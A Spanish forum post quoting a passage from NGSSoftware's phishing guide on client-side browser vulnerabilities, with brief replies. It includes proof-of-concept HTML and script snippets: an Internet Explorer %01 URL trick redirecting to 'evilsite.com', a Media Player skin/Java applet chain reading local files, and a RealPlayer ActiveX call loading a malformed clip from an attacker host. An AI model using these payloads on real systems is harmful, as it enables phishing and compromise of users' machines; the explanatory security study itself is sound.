Hola:
Lo siguiente fue extraido de un texto sobre phishing de NISR-WP
NGSSoftware Insight Security Research Page 19 of 42
http://www.ngsconsulting.com2.3.7. Client-side VulnerabilitiesThe sophisticated browsers customers use to surf the web, just like any other commercial piece of software, are often vulnerable to a myriad of attacks. The more functionality built into the browser, the more likely their exists a vulnerability that could be exploited by an attacker to gain access to, or otherwise observe, confidential information of the customer.
While software vendors have made great strides in methods of rolling out software updates and patches, home users are notoriously poor in applying them. This, combined with the ability to install add-ons (such as Flash, RealPlayer and other embedded applications) means that there are many opportunities for attack.
Similar to the threat posed by some of the nastier viruses and automated worms, these vulnerabilities can be exploited in a number of ways. However, unlike worms and viruses, many of the attacks cannot be stopped by anti-virus software as they are often much harder to detect and consequently prevent (i.e. the stage in which the antivirus product is triggered, is usually after the exploitation and typically only if the attacker tries to install a well known Backdoor Trojan or key-logger utility).
Example 1: Microsoft Internet Explorer URL MishandlingBy inserting a character (in this case 0x01 – represented as the escape encoded sequence %01) within the username section of the Friendly Login URL, a user would be redirected to the attackers server, but characters after the %01 would not be displayed in the browser URL field. Therefore this attack could be used to obfuscate the attackers full URL.
Sample HTML code:
l
ocation.href=unescape('http://www.mybank.com%01@evilsite.com/phishing/fakepage.htm');
Example 2: Microsoft Internet Explorer and Media Player CombinationA vulnerability existed within Microsoft Media Player that was exploitable through java coding with Microsoft Internet Explorer. This vulnerability enabled remote servers to read local customer files, browse directories and finally execution of arbitrary software. Depending upon the software being executed, the attacker had the potential to take control of the customer’s computer.
The problem lay with how Media Player downloaded customised skins and stored them. For example:
"C:/Program files/Windows Media Player/Skins/SKIN.WMZ" : <IFRAME
SRC="wmp2.wmz"></IFRAME>
Will download wmp2.wmz and place it in the defined folder. Unfortunately, the file wmp2.wmz may be a java jar archive. Therefore the following applet tag:
<APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media
Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>
Will be executed with codebase="file://c:/" and the applet will have read only access to C:\.
To execute this code automatically, all an attacker had to do was get the web browser to open a simple HTML fie such as the one below:
<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
The Phishing Guide
function f()
{
window.open("wmp7-bad.htm");
}
setTimeout("f()",4000);
</SCRIPT>
Which calls a secondary HTML file (wmp7-bad.htm)
<
APPLET CODEBASE="file://c:/"
ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class"
WIDTH=700 HEIGHT=300>
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>
Example 3: RealPlayer/RealOne Browser Extension Heap CorruptionRealPlayer is the most widely used product for internet media delivery, with in excess of 200 million users worldwide. All popular web browsers offer support for RealPlayer and the automatic playing of media.
By crafting a malformed .RA, .RM, .RV or .RMJ file it possible to cause heap corruption that can lead to execution of an attacker’s arbitrary code. By forcing a browser or enticing a user to a website containing such a file, arbitrary attacker supplied code could be automatically executed on the target machine. This code will run in the security context of the logged on user.
<OBJECT ID="RealOneActiveXObject" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDC7A535-4070-4B92-
A0EA-D9994BCC0DC5"></OBJECT>
// Play a clip and show new status display
function clipPlay() {
window.parent.external.PlayClip(
"rtsp://evilsite.com/hackme.rm",
"Title=Glorious Day|Artist name=Me Alone")
}
More information is available from:
http://www.nextgenss.com/advisories/realra.txtSaludos.
Autor
.
En línea
, veo ya muchos metodos interesantes y estudiando (solo estudiando) mas sobre worms o algunos nuevos methods sobre bypass IDS and Sql injectios.
.
